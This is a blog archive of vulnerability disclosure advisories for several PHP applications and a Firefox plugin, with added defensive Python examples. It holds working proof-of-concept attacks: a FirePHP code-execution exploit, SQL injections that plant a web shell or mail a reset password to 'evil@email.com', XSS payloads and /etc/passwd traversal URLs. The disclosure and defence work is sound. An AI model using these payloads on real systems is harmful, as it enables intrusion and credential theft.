Results tagged “disclosure” from Just Another Hacker

--------------------------------------------------------------------------------------------
20130417 - Justanotherhacker.com : FirePHP firefox plugin remote code execution
JAHx132 - http://www.justanotherhacker.com/advisories/JAHx132.txt
--------------------------------------------------------------------------------------------

FirePHP enables you to log to your Firebug Console using a simple PHP method call.
All data is sent via response headers and will not interfere with the content on your page.
FirePHP is ideally suited for AJAX development where clean JSON and XML responses are required.
[ Taken from: http://www.firephp.org/ ]


--- Vulnerability description ---
The extension does not sufficiently validate cell names in array data received from the remote 
host resulting in arbitrary script execution in the chrome privileged context if a user
inspects the malicious data in firephp.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Remote Code Execution
Severity: High
Release: Responsible
Vendor: FirePHP - http://www.firephp.org/
Affected versions: All versions prior to 0.7.2


--- Proof of Concept ---
<?php
/*************************************************************
 * FirePHP Firefox plugin Remote code execution PoC                            *
 * Written by Wireghoul - http://www.justanotherhacker.com   *
 * Greetz to @bcoles urbanadventurer @malerisch              *
 *************************************************************/

// XUL code to launch calc.exe
$exploit =  '{"RequestHeaders":{"1":"1","2":"2","3":"3","4":"4","5":"5","6":"6","7":"7","8":"8","9":"9","UR<script>';
$exploit.= 'var lFile=Components.classes[\"@mozilla.org/file/local;1\"].createInstance(Components.interfaces.nsILocalFile);';
$exploit.= 'lFile.initWithPath(\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\calc.exe\");';
$exploit.= 'var process=Components.classes[\"@mozilla.org/process/util;1\"].createInstance(Components.interfaces.nsIProcess);';
$exploit.= 'process.init(lFile);';
$exploit.= 'process.run(true,[],0);void(0);';
$exploit.= '<\/SCRIPT>":"PWNT"}}';

// Send FirePHP dump data
header("X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2");
header("X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3");
header("X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/Dump/0.1");
$payload= "X-Wf-1-1-1-1: ";
$payload.= strlen($exploit).'|'.$exploit."|\r\n";
header($payload);
?>
<html>
<head>
  <title>FirePHP Firefox plugin RCE PoC</title>
</head>
<body>
PWNT!
</body>
</html>
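Added example (my own code, not part of the advisory or of FirePHP): a Python parser for the "length|json|" framing that the PoC above emits in the X-Wf-1-1-1-1 header, a check that flags cell names containing markup characters, and a renderer that HTML-escapes every key and value before it is displayed, which is the property the vulnerable extension lacked. The MALICIOUS_DUMP sample is constructed to mirror the PoC's cell name; only the standard library is used.

```python
import html
import json


def build_wildfire_value(payload_obj) -> str:
    """Encode an object the way the PoC does: "<byte length>|<json>|"."""
    body = json.dumps(payload_obj, separators=(",", ":"))
    return f"{len(body.encode('utf-8'))}|{body}|"


def parse_wildfire_value(value: str) -> dict:
    """Parse one X-Wf-1-1-1-1 header value and enforce the framing.

    The length prefix must equal the UTF-8 byte length of the JSON body
    (PHP's strlen counts bytes), the body must be a JSON object, and the
    value must end with the "|" delimiter. Anything else is rejected
    before any rendering takes place.
    """
    if not value.endswith("|"):
        raise ValueError("missing trailing delimiter")
    length_str, sep, rest = value.partition("|")
    if not sep or not length_str.isdigit():
        raise ValueError("missing or non-numeric length prefix")
    body = rest[:-1]
    if len(body.encode("utf-8")) != int(length_str):
        raise ValueError("length prefix does not match body")
    data = json.loads(body)
    if not isinstance(data, dict):
        raise ValueError("top-level value must be a JSON object")
    return data


def suspicious_keys(data: dict, found=None) -> list:
    """Collect cell names (keys) that contain markup-significant characters."""
    found = [] if found is None else found
    for key, val in data.items():
        if any(ch in str(key) for ch in "<>\"'"):
            found.append(str(key))
        if isinstance(val, dict):
            suspicious_keys(val, found)
    return found


def render_table(data: dict) -> str:
    """Render the dump as HTML with every key and value escaped, so an
    untrusted cell name can never become a tag or an attribute."""
    rows = []
    for key, val in data.items():
        cell = render_table(val) if isinstance(val, dict) else html.escape(str(val), quote=True)
        rows.append(f"<tr><th>{html.escape(str(key), quote=True)}</th><td>{cell}</td></tr>")
    return "<table>" + "".join(rows) + "</table>"


# Constructed sample modelled on the PoC: a cell name that carries a script tag.
MALICIOUS_DUMP = {"RequestHeaders": {"1": "1", "UR<script>alert(1)</SCRIPT>": "PWNT"}}
MALICIOUS_VALUE = build_wildfire_value(MALICIOUS_DUMP)

if __name__ == "__main__":
    parsed = parse_wildfire_value(MALICIOUS_VALUE)
    print("flagged cell names:", suspicious_keys(parsed))
    print(render_table(parsed))
```

The same escaping rule applies to any client-side console that renders server-supplied structures: keys are data, never markup, and a length prefix that does not match the body is a malformed message to drop, not to repair.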


--- Solution ---
Upgrade to version 0.7.2


--- Disclosure time line ---
17-Apr-2013 - Public disclosure
17-Apr-2013 - New version available via mozilla addons
12-Apr-2013 - New version
12-Apr-2013 - Vendor acknowledge vulnerability
09-Apr-2013 - Vendor notified through email


--------------------------------------------------------------------------------------------
20130212 - Justanotherhacker.com : httpdx multiple access control bypass
JAHx131 - http://www.justanotherhacker.com/advisories/JAHx131.txt
--------------------------------------------------------------------------------------------

Single-process HTTP1.1/FTP server; no threads or processes started per connection, runs with
only few threads. Includes directory listing, virtual hosting, basic auth., support for PHP,
Perl, Python, SSI, etc. All settings in one config/script file.
[ Taken from: http://sourceforge.net/projects/httpdx/ ]


--- Vulnerability description ---
Access control in httpdx is done with string matching directives in the configuration file.
Request variables are compared to static strings to determine if access should be granted.
Examples provided in the default configuration include:
    if<%REQUEST_URI% == "/data/users.txt*">{
        http.deny = 1;
    }
And another example:
    if<%REQUEST_URI% == "/admin.html*">{
        http.auth = { //authorization needed for admin's section
            user="admin",
            pass="passw000",
            realm="Stuff for admin only!"
        };
    }
As long as the request does not match these static strings but the path still resolves to the same
files, you can access the content.

Additionally, as the server doesn't support traditional binding of virtualhosts to network
interfaces you must configure virtualhost specific behaviour through similar string matching
directives.
    if<%HTTP_HOST% != "127.0.0.1" && %HTTP_HOST% == {localhost,127.*.*.*}>{
The variable HTTP_HOST is set from the Host: header in the request, so in order to access the
localhost virtualhost remotely, just set your Host: header to localhost.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Access control bypass
Severity: Low
Release: Full disclosure
CVE: None
Vendor: httpdx - http://sourceforge.net/projects/httpdx/
Affected versions: 1.5.5, 1.5.4 and probably earlier versions

--- Proof of Concept ---
The server comes with two examples of access control, a restricted file and a password
protected administrator area running on localhost. The following examples successfully
access these restricted areas remotely:

Access user file:
user@~$ GET http://192.168.58.135/data//users.txt
user1=pass123
user2=pass321

Access admin console:
user@~$ echo -e "GET /%2fadmin.html HTTP/1.1\r\nHost: localhost\r\n\r\n" | nc 192.168.58.135 80
HTTP/1.1 200 OK
Date: Thu, 08 Nov 2012 03:25:58 GMT
Content-Type: text/html
Last-Modified: Mon, 20 Jul 2009 14:03:48 GMT
Content-Length: 36
Connection: close
Server: httpdx/1.5.4 (Win32)
Pragma: no-cache

Ok, you're now at admin's section.
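Added example (my own code, not httpdx's): the two bypasses above work because the ACL compares the raw request string rather than the path the server will actually open, and because "local" is decided from the attacker-controlled Host header. The Python below canonicalises the path (percent-decode, collapse slashes, resolve dot segments) before matching the default configuration's patterns, and decides locality from the TCP peer address instead. Case-insensitive matching is an assumption made because the advisory's target ran on Win32, where the filesystem ignores case.

```python
import ipaddress
import posixpath
import re
from fnmatch import fnmatchcase
from urllib.parse import unquote

# Patterns from the default httpdx configuration quoted in the advisory.
PROTECTED_PATTERNS = ["/data/users.txt*", "/admin.html*"]


def normalize_request_path(raw_path: str) -> str:
    """Canonicalise a request path before it is compared with any ACL pattern.

    Order matters: drop the query string, percent-decode once, reject NUL
    bytes, collapse repeated slashes, then resolve "." and ".." segments.
    The result is the path the server would actually open on disk.
    """
    path = raw_path.split("?", 1)[0]
    path = unquote(path)             # "/%2fadmin.html" -> "//admin.html"
    if "\x00" in path:
        raise ValueError("NUL byte in request path")
    path = re.sub(r"/+", "/", path)  # "/data//users.txt" -> "/data/users.txt"
    if not path.startswith("/"):
        path = "/" + path
    return posixpath.normpath(path)  # "/x/../admin.html" -> "/admin.html"


def is_protected(raw_path: str, patterns=PROTECTED_PATTERNS, case_insensitive=True) -> bool:
    """Match the canonical path against the ACL patterns.

    case_insensitive defaults to True on the assumption that the ACL should
    behave like the (case-insensitive) Win32 filesystem behind it.
    """
    path = normalize_request_path(raw_path)
    if case_insensitive:
        path = path.lower()
        patterns = [p.lower() for p in patterns]
    return any(fnmatchcase(path, p) for p in patterns)


def is_loopback_client(peer_ip: str) -> bool:
    """Decide "local" from the TCP peer address. The Host header is chosen by
    the client and must never feed this decision."""
    return ipaddress.ip_address(peer_ip).is_loopback


if __name__ == "__main__":
    for probe in ["/data//users.txt", "/%2fadmin.html", "/foo/../ADMIN.html", "/index.html"]:
        print(f"{probe:22} -> {normalize_request_path(probe):18} protected={is_protected(probe)}")
    print("Host: localhost from 192.168.58.1 counts as local?", is_loopback_client("192.168.58.1"))
```

Both PoC requests from the advisory ("/data//users.txt" and "/%2fadmin.html") normalise onto the protected paths, so a server that matched after normalisation would have denied them.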


--- Solution ---
The software appears to be abandoned and the same versions suffer from remote code execution
bugs. Use different software instead.

--- Disclosure time line ---
12-Feb-2013 - Public disclosure

--------------------------------------------------------------------------------------------
20121017 - Justanotherhacker.com : Symphony cms - Multiple vulnerabilities
JAHx122 - http://www.justanotherhacker.com/advisories/JAHx122.txt
--------------------------------------------------------------------------------------------

Symphony is an XSLT-powered open source content management system.
[ Taken from: http://getsymphony.com/ ]


--- Vulnerability description ---
Symphony-cms version 2.3 suffers from several vulnerabilities ranging in severity from low to
high, which together can result in complete compromise by an unauthenticated attacker.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Multiple
Severity: High
Release: Responsible
Vendor: Symphony - http://getsymphony.com
Affected versions: 2.3 (and possibly earlier)

--- Local path disclosure ---
Direct requests to library files disclose the full local file path if PHP is configured to
display errors, because the library path is declared in a global-scope constant outside of the
library script itself.

PoC:
http://host/path/symphony/lib/boot/bundle.php

--- User enumeration ---
The retrieve password url http://host/path/symphony/login/retrieve-password/ will display a helpful error message if the email address entered does not exist in the database.

--- Authentication token brute force ---
Symphony-cms allows a user to login without entering their username and password via
a remote auth url that contains a token made up of the first 8 characters of a sha1 hash
of the user's username and hashed password.

If a user has auth_token_active set to yes in the sym_authors table, an attacker can log in to their account by brute forcing the 8-character hexadecimal token ([0-9A-F]^8).

The url has the form http://host/path/symphony/login/[token]/, e.g. http://host/path/symphony/login/a39880be/ for the user "admin" with password "admin".
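Added example (my own code, not Symphony's): the token URL above has a fixed shape, which makes brute forcing easy to spot in access logs. The Python below parses Apache-style log lines (the format and the sample lines are constructed), counts how many distinct tokens each client address has tried against /symphony/login/<token>/, and flags addresses above a threshold. A legitimate user presents one token; dozens of different ones from a single source is the signature of a sweep of the 16^8 space.

```python
import re
from collections import defaultdict

# Size of the token space described in the advisory: 8 hex characters.
TOKEN_KEYSPACE = 16 ** 8

# A remote-login request as the advisory describes the URL:
# .../symphony/login/<8 hex chars>/ . Log format assumed: Apache common/combined.
LOGIN_TOKEN_RE = re.compile(
    r'^(?P<ip>\S+) .*?"GET \S*/symphony/login/(?P<token>[0-9a-fA-F]{8})/\S* HTTP/'
)


def distinct_tokens_per_ip(log_text: str) -> dict:
    """Count the distinct login tokens tried by each client address."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        m = LOGIN_TOKEN_RE.match(line)
        if m:
            seen[m["ip"]].add(m["token"].lower())
    return {ip: len(tokens) for ip, tokens in seen.items()}


def flag_token_guessing(log_text: str, threshold: int = 20) -> dict:
    """Return the addresses that tried at least `threshold` different tokens."""
    return {ip: n for ip, n in distinct_tokens_per_ip(log_text).items() if n >= threshold}


# Constructed sample log: one address sweeping sequential tokens, one real login.
ATTACK_LINES = [
    f'10.0.0.5 - - [17/Oct/2012:10:00:{i % 60:02d} +0000] '
    f'"GET /symphony/login/{i:08x}/ HTTP/1.1" 302 0'
    for i in range(50)
]
LEGIT_LINES = [
    '10.0.0.9 - - [17/Oct/2012:10:05:00 +0000] "GET /symphony/login/a39880be/ HTTP/1.1" 200 1234',
    '10.0.0.9 - - [17/Oct/2012:10:05:02 +0000] "GET /symphony/login/ HTTP/1.1" 200 2048',
]
SAMPLE_LOG = "\n".join(ATTACK_LINES + LEGIT_LINES)

if __name__ == "__main__":
    print("token space:", TOKEN_KEYSPACE)
    print("distinct tokens per IP:", distinct_tokens_per_ip(SAMPLE_LOG))
    print("flagged:", flag_token_guessing(SAMPLE_LOG))
```

The threshold is deliberately low: with a keyspace of 16^8, any address that has tried more than a handful of distinct tokens is not a user who mistyped a link. The response status codes in the sample are made up and the detector does not rely on them.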


--- Cross site scripting ---
Reflected:
The email input field supplied to http://host/path/symphony/login/retrieve-password/ is not sufficiently filtered for malicious characters resulting in reflected cross site scripting.

PoC:
Submit form with email address:
"><script>alert(1)</script>

Reflected:
The email input field supplied to http://host/path/symphony/login/ is not sufficiently filtered for malicious characters resulting in reflected cross site scripting.

PoC:
username=%22%3E%3C%2Finput%3E%3Cscript%3Ealert%28%27k63ddgb6ra%27%29%3C%2Fscript%3E&password=on

Persistent:
The "From name" preference setting in Symphony-cms (http://host/path/symphony/system/preferences/) is not sufficiently encoded resulting in persistent cross site scripting.

PoC:
settings%5Bemail_sendmail%5D%5Bfrom_name%5D=Symphony%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

--- Blind sql injection ---
The username field in the author's detail page is not sufficiently filtered when checking
whether the username already exists in the system, resulting in blind sql injection.

PoC:
Edit an author's profile, update the username to include a malicious payload, ie:
username' union select "<?php @system($_REQUEST['cmd']); ?>" FROM sym_authors INTO OUTFILE '/var/www/workspace/haxed.php
where the path to your outfile is based on the local path disclosure.

--- SQL Injection ---
The "page" number supplied when editing blueprints is vulnerable to sql injection.

We can retrieve a user's username, hashed password and auth token status with the following PoC:
http://host/path/symphony/bluePRINTs/pages/edit/0%29+union+select+1,2,username,password,5,auth_token_active,7,8,9+from+sym_authors+where+id+=+1+--+/

--- Unrestricted file upload ---
While this appears to be intended functionality for authorised users, combined
with the aforementioned vulnerabilities it becomes trivial to place a backdoor
on the system.

--- Solution ---
Upgrade to version 2.3.1.

--- Disclosure time line ---
17-Oct-2012 - Public disclosure
03-Oct-2012 - Issues patched in upcoming release
18-Sep-2012 - Patch checked into git
17-Sep-2012 - Vendor response
14-Sep-2012 - Vendor notified through email

--------------------------------------------------------------------------------------------
20120831 - Justanotherhacker.com : PHP Shell Detector - Cross site scripting
JAHx121 - http://www.justanotherhacker.com/advisories/JAHx121.txt
--------------------------------------------------------------------------------------------

PHP Shell Detector is a php script that helps you find and identify php shells. It also has
a "web shells" signature database that helps to identify "web shell" up to 99%. By using the
latest javascript and css technologies, php shell detector has a light weight and friendly
interface. The main features is that if you're not sure about a suspicious file, you may send
it to the websecure.co.il team.  After submitting your file, it will be inspected and if
there are any threats, it will be inserted into a "php shell detector" web shells signature
database and the next time this file will be recognized positively.
[ Taken from: http://www.emposha.com/security/php-shell-detector-web-shell-detection-tool.html ]


--- Vulnerability description ---
The shell detector script does not sufficiently sanitise filenames of detected shells or
suspicious files, resulting in cross site scripting.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Cross Site Scripting
Severity: Low
Release: Full
CVE: None
Vendor: Emposha - http://www.emposha.com/
Affected versions: 1.51 - earlier versions may also be affected.

--- Proof of Concept ---
Create a payload out of a file detected by the PSD script, ie:
root@localhost:~# mv htaccess.php  \<img\ src\=x\ onerror\=alert\(1\)\>.txt
Then scan the directory containing the renamed file.

--- Solution ---
There is no solution at this time.

--- Disclosure time line ---
31-Aug-2012 - Public disclosure

--------------------------------------------------------------------------------------------
20110713 - Justanotherhacker.com : Chyrp - Multiple vulnerabilities
JAHx113 - http://www.justanotherhacker.com/advisories/JAHx113.txt
--------------------------------------------------------------------------------------------

Chyrp is a blogging engine designed to be very lightweight while retaining functionality. It
is powered by PHP and has very powerful theme and extension engines, so you can personalize
it however you want. The code is well-documented, and it has a very strong structure that's
loosely based on the MVC design pattern
[ Taken from: http://chyrp.net ]


--- Vulnerability description ---
The chyrp blogging engine was found to suffer from multiple vulnerabilities in multiple versions.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Multiple
Severity: High
Release: Responsible, via oCERT
CVE: Not yet assigned
Vendor: chyrp.net
Affected versions: <= 2.1

--- Cross site scripting ---
The action parameter is not sufficiently filtered, escaped or encoded resulting in cross site scripting.
Exploit:
http://domain/path/admin/?action=[XSS]
http://domain/path/includes/javascript.php?action=[XSS]
PoC:
The javascript.php xss can also be invoked through rewrite rules using the following querystring -
http://domain/path/?%22%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E;url=blah

--- Cross site scripting ---
The title and body parameters are not initialized in the admin/help.php file resulting in cross site
scripting if register globals is on.
Exploit:
http://domain/path/admin/help.php?title=[XSS]&body=[XSS]

--- Local file inclusion ---
The action parameter is not sufficiently filtered and vulnerable to local file inclusion.
Exploit:
http://domain/path/?action=[LFI]
PoC:
http://domain/path/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpassword%00

--- Directory traversal ---
The file parameter for includes/lib/gz.php is vulnerable to a directory traversal bug in Chyrp versions <=2.0.
This is due to a php gotcha: using the return value of strpos directly in an if statement treats a match at
position 0 as false, so such matches produce a false negative.
Exploit:
http://domain/path/includes/lib/gz.php?file=/themes/../../../../../../[PATH]
PoC:
http://domain/path/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd
http://domain/path/includes/lib/gz.php?file=/themes/../includes/config.yaml.php


--- Arbitrary file upload ---
Arbitrary file upload can be done by authorised users in Chyrp version <= 2.0 with the swfupload extension and
file upload feathers enabled. The uploaded file extension is restricted through javascript. Modify js in page
using firebug or via intercepting proxy to allow *.php upload. A direct POST to
http://domain/path/modules/swfupload/upload_handler.php can also be done, but changing js is far easier.

PoC:
Appended ;*.php in script for the add photo feather (http://domain/path/admin/?action=write_post&feather=photo) using intercepting proxy
<script type="text/javascript">
$(function(){
$("#photo").clone().attr("id", "photo_fake").addClass("swfupload_button").insertBefore("#photo")
photo = new SWFUpload({
upload_url : "http://localhost/chyrp_v2.0/modules/swfupload/upload_handler.php",
flash_url : "http://localhost/chyrp_v2.0/modules/swfupload/lib/swfupload.swf",
post_params: {"PHPSESSID" : "5o3bnghnijk4hlr7vnshi3vb76", "PHPSESSNAME" : "ChyrpSession", "ajax" : "true" },
file_size_limit : "100 MB",
file_types : "*.jpg;*.jpeg;*.png;*.gif;*.bmp;*.php", <-- #MODIFY!
file_types_description : "All Files",

file_queue_error_handler : fileQueueError,
file_dialog_complete_handler : fileDialogComplete,
upload_start_handler : uploadStart,
upload_progress_handler : uploadProgress,
upload_error_handler : uploadError,
upload_success_handler : uploadSuccess,
button_placeholder_id : "photo",
button_width : $("#photo_fake").width(),
button_height : $("#photo_fake").height(),
button_action : SWFUpload.BUTTON_ACTION.SELECT_FILES,
upload_complete_handler : uploadComplete
})
$("#SWFUpload_0")
.css({ position: "absolute", top: $("#photo_fake").offset().top, left: $("#photo_fake").offset().left })
.before('<div id="progress"><div class="back"><div class="fill"></div><div class="clear"></div></div></div>')
})
</script>

--- Solution ---
Upgrade to version 2.1.1

--- Disclosure time line ---
13-Jul-2011 - Public disclosure
17-May-2011 - Vendor notified
17-May-2011 - oCERT notified

--------------------------------------------------------------------------------------------
20110525 - Justanotherhacker.com : Cross site scripting in Movable Type
JAHx112 - http://www.justanotherhacker.com/advisories/JAHx112.txt
--------------------------------------------------------------------------------------------

Movable Type is a professional publishing platform
[ Taken from: http://www.movabletype.org ]


--- Vulnerability description ---
The 'static' parameter to the comment script is not sufficiently sanitised which allows an attacker
to break out of the meta redirect url in the response, resulting in a cross site scripting attack.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Cross Site Scripting
Severity: Low
Release: Responsible
CVE: Unassigned
Movable Type BugID: #105441
Vendor: Six Apart Ltd - http://www.sixapart.com
Affected versions:
* Movable Type Open Source 4.x
* Movable Type Open Source 5.x
* Movable Type 4.x ( with Professional Pack, Community Pack )
* Movable Type 5.x ( with Professional Pack, Community Pack )
* Movable Type Enterprise 4.x


--- Proof of Concept ---
http://vuln.com/cgi-bin/mt-comment.cgi?__mode=handle_sign_in&static="><script>alert(document.cookie)</script>&logout=1&entry_id=


--- Solution ---
Upgrade to the latest versions of Movable Type 4 or Movable Type 5.
* Movable Type Open Source 4.36
* Movable Type Open Source 5.05
* Movable Type Open Source 5.1
* Movable Type 4.36( with Professional Pack, Community Pack)
* Movable Type 5.05( with Professional Pack, Community Pack)
* Movable Type 5.1( with Professional Pack, Community Pack)
* Movable Type Enterprise 4.36
* Movable Type Advanced 5.1

--- Disclosure time line ---
25-May-2011 - Advisory released
24-May-2011 - New version released
18-May-2011 - Patch produced
11-Jan-2011 - Vendor acknowledge vulnerability
08-Jan-2011 - Vendor notified through email

--------------------------------------------------------------------------------------------
20110424 - Justanotherhacker.com : Symphony-cms blind sql injection
JAHx111 - http://www.justanotherhacker.com/advisories/JAHx111.txt
--------------------------------------------------------------------------------------------

Symphony is a web-based content management system (CMS) that enables users to create and
manage websites and web applications of all shapes and sizes, from the simplest of blogs to
bustling news sites and feature-packed social networks.
[ Taken from: http://symphony-cms.com/ ]


--- Vulnerability description ---
The symphony cms login page does not sufficiently filter user supplied variables used in a
SQL statement, resulting in a blind sql injection vulnerability. The vulnerable code is located at:
content.login.php-270-$sql = "SELECT t1.`id`, t1.`email`, t1.`first_name`
content.login.php-271- FROM `tbl_authors` as t1, `tbl_forgotpass` as t2
content.login.php:272: WHERE t2.`token` = '".$_REQUEST['token']."' AND t1.`id` = t2.`author_id`
content.login.php-273- LIMIT 1";
content.login.php-274-
content.login.php-275-$author = Symphony::Database()->fetchRow(0, $sql);

Discovered by: Eldar "Wireghoul" Marcussen
Type: Blind sql injection
Severity: Moderate
Release: Full
CVE: None
Vendor: Symphony-cms
Affected versions: 2.1.2 and possibly older versions

--- Proof of Concept ---
The following example will reset the password of the admin user which was created during installation
(id 1) and send an email to 'evil@email.com' with the username and new password.
http://example.com/symphony/login/?action=resetpass&token=-1'+union+select+id,'evil@email.com',username+from+tbl_authors+where+id+=1+--+

We are aided by the following code:
lib/toolkit/class.mysql.php:251:if($this->_connection['tbl_prefix'] != 'tbl_'){
lib/toolkit/class.mysql.php:252: $query = preg_replace('/tbl_(\S+?)([\s\.,]|$)/', $this->_connection['tbl_prefix'].'\\1\\2', $query);
which turns our tbl_authors into the appropriately prefixed table name. This essentially negates
the use of a custom table prefix as a hurdle.
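Added example (my own code, a Python port of the query shape above rather than Symphony's PHP): the vulnerable lookup splices the token into the SQL text, so a quote character in the request rewrites the statement; the hardened version binds the token as a parameter and the same input is only ever compared with t2.token. The in-memory SQLite tables and rows are constructed; the injected token is the one from the PoC URL, URL-decoded.

```python
import sqlite3


def build_demo_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the two tables the query joins.
    Column names follow the advisory's snippet; the rows are made up."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE tbl_authors (id INTEGER, email TEXT, first_name TEXT, username TEXT);
        CREATE TABLE tbl_forgotpass (token TEXT, author_id INTEGER);
        INSERT INTO tbl_authors VALUES (1, 'admin@example.invalid', 'Admin', 'admin');
        INSERT INTO tbl_forgotpass VALUES ('7f3a9c1e', 1);
        """
    )
    return con


def lookup_vulnerable(con: sqlite3.Connection, token: str):
    """Port of the concatenation in content.login.php: the token becomes part
    of the SQL text, so quote characters change the query's structure."""
    sql = (
        "SELECT t1.id, t1.email, t1.first_name "
        "FROM tbl_authors AS t1, tbl_forgotpass AS t2 "
        "WHERE t2.token = '" + token + "' AND t1.id = t2.author_id "
        "LIMIT 1"
    )
    return con.execute(sql).fetchone()


def lookup_safe(con: sqlite3.Connection, token: str):
    """Same query with the token bound as a parameter: the driver passes it
    as data, so it can only ever be compared with t2.token."""
    sql = (
        "SELECT t1.id, t1.email, t1.first_name "
        "FROM tbl_authors AS t1, tbl_forgotpass AS t2 "
        "WHERE t2.token = ? AND t1.id = t2.author_id "
        "LIMIT 1"
    )
    return con.execute(sql, (token,)).fetchone()


# The token value from the PoC URL above, URL-decoded.
INJECTED_TOKEN = "-1' union select id,'evil@email.com',username from tbl_authors where id =1 -- "

if __name__ == "__main__":
    con = build_demo_db()
    print("valid token, safe    :", lookup_safe(con, "7f3a9c1e"))
    print("injected, vulnerable :", lookup_vulnerable(con, INJECTED_TOKEN))
    print("injected, safe       :", lookup_safe(con, INJECTED_TOKEN))
```

With the parameterised lookup the injected string matches no token and the reset flow never sees an attacker-chosen e-mail address; the table-prefix rewriting described above is irrelevant once the value cannot reach the parser as SQL.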

--- Solution ---
Upgrade to version 2.2

--- Disclosure time line ---
24-Apr-2011 - Public disclosure

--------------------------------------------------------------------------------------------
20101028 - Justanotherhacker.com : Multiple vulnerabilities in Feindura CMS
JAHx104 - http://www.justanotherhacker.com/advisories/JAHx104.txt
--------------------------------------------------------------------------------------------


Feindura is a Open Source flat file based Content Management System for Web Designers,
written in PHP. There is no need of a database and it's easy to integrate in your Websites
[ Taken from: http://feindura.org ]

--- Vulnerability description ---
Feindura CMS suffers from multiple vulnerabilities.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Multiple
Severity: Medium
Release: Responsible
Affected versions: <= 1.0rc

--- Cross site scripting ---
The category parameter provided to editor.php is not sufficiently filtered and is vulnerable to cross site scripting.
Looking at the source we can see the variable gets assigned directly from user input and later used in output.
library/sites/editor.php:24   $category = $_GET['category'];
library/sites/editor.php:186  echo '<form action="'.$_SERVER['PHP_SELF'].'?category='.$category.'&amp;page='.$page.'" method="post" accept-charset="UTF-8" id="editorForm">
Exploit:
http://[host]/[path]/library/sites/editor.php?category=[XSS]
PoC:
http://demo.feindura.org/library/sites/editor.php?category=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

--- Local file inclusion ---
The download.php script does not apply base path restrictions on the filename, which allows arbitrary file reads.
library/process/download.php:22 header('Content-Type: x-type/subtype'); //"Bug-fix" for IE 4.x & 5.x
library/process/download.php:23
library/process/download.php:24 readfile(DOCUMENTROOT.$adminConfig['savePath'].$_GET['group'].'/'.$_GET['filename']);
Exploit:
http://[host]/[path]/library/process/download.php?filename=[path/to/file]
PoC:
http://demo.feindura.org/library/process/download.php?filename=../../../../../../../etc/passwd

--- Local file inclusion ---
The filemanager script does not apply base path restrictions on the path, which allows arbitrary file reads.
The vulnerable code is as follows:
library/thirdparty/filemanager/connectors/php/filemanager.php:72                   case 'download':
library/thirdparty/filemanager/connectors/php/filemanager.php:73                           if($fm->getvar('path')) {
library/thirdparty/filemanager/connectors/php/filemanager.php:74                                   $fm->download();
library/thirdparty/filemanager/connectors/php/filemanager.php-75                           }
library/thirdparty/filemanager/connectors/php/filemanager.class.php:245    public function download() {
library/thirdparty/filemanager/connectors/php/filemanager.class.php-246            if(isset($this->get['path']) && file_exists($_SERVER['DOCUMENT_ROOT'] . $this->get['path'])) {
library/thirdparty/filemanager/connectors/php/filemanager.class.php:247                    header("Content-type: application/force-downloa ");
library/thirdparty/filemanager/connectors/php/filemanager.class.php-248                    header('Content-Disposition: inline; filename="' . $_SERVER['DOCUMENT_ROOT'] . $this->get['path'] . '"');
library/thirdparty/filemanager/connectors/php/filemanager.class.php-249                    header("Content-Transfer-Encoding: Binary");
library/thirdparty/filemanager/connectors/php/filemanager.class.php-250                    header("Content-length: ".filesize($_SERVER['DOCUMENT_ROOT'] . $this->get['path']));
library/thirdparty/filemanager/connectors/php/filemanager.class.php-251                    header('Content-Type: application/octet-stream');
library/thirdparty/filemanager/connectors/php/filemanager.class.php-252                    $tmp = explode('/',$this->get['path']);
library/thirdparty/filemanager/connectors/php/filemanager.class.php-253                    $filename = $tmp[(sizeof($tmp)-1)];
library/thirdparty/filemanager/connectors/php/filemanager.class.php-254                    header('Content-Disposition: attachment; filename="' . $filename . '"');
library/thirdparty/filemanager/connectors/php/filemanager.class.php-255                    readfile($_SERVER['DOCUMENT_ROOT'] . $this->get['path']);
library/thirdparty/filemanager/connectors/php/filemanager.class.php-256            } else {
library/thirdparty/filemanager/connectors/php/filemanager.class.php-257                    $this->error(sprintf($this->lang('FILE_DOES_NOT_EXIST'),$this->get['path']));
library/thirdparty/filemanager/connectors/php/filemanager.class.php-258            }
library/thirdparty/filemanager/connectors/php/filemanager.class.php-259    }
Exploit:
http://[host]/[path]/library/thirdparty/filemanager/connectors/php/filemanager.php?mode=download&path=[path/to/file]
PoC:
http://demo.feindura.org/library/thirdparty/filemanager/connectors/php/filemanager.php?mode=download&path=/../../../../../../../../etc/passwd

--- Local file inclusion ---
Language selection code does not sufficiently filter the supplied variable, resulting in arbitrary file reads and code execution.
Vulnerable code:
index.php:26 include("library/backend.include.php");
library/backend.include.php:46 if(isset($_GET['language']))
library/backend.include.php:47   $_SESSION['language'] = $_GET['language'];
library/backend.include.php-56 // includes the langFile which is set by the session var
library/backend.include.php:57 $langFile = include(dirname(__FILE__).'/lang/'.$_SESSION['language'].'.backend.php');
library/backend.include.php-58
Exploit:
http://[host]/[path]/?language=../../../../../../../etc/passwd%00
PoC:
http://demo.feindura.org/?language=../../../../../../../etc/passwd%00
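Added example (my own code, not Feindura's or Chyrp's) covering the traversal and inclusion issues in this advisory (download.php, the filemanager connector and the language include) and the gz.php traversal in the Chyrp advisory (JAHx113) above. It shows three things: the truthiness gotcha that advisory describes, reproduced with Python's str.find as a constructed illustration; a safe_join that resolves a user-supplied path under a base directory and refuses anything that escapes it or contains a NUL byte (the %00 trick in the PoCs); and an allow-list for the language code, which is the right fix where the set of legitimate values is small and known.

```python
import posixpath
import re
from typing import Optional


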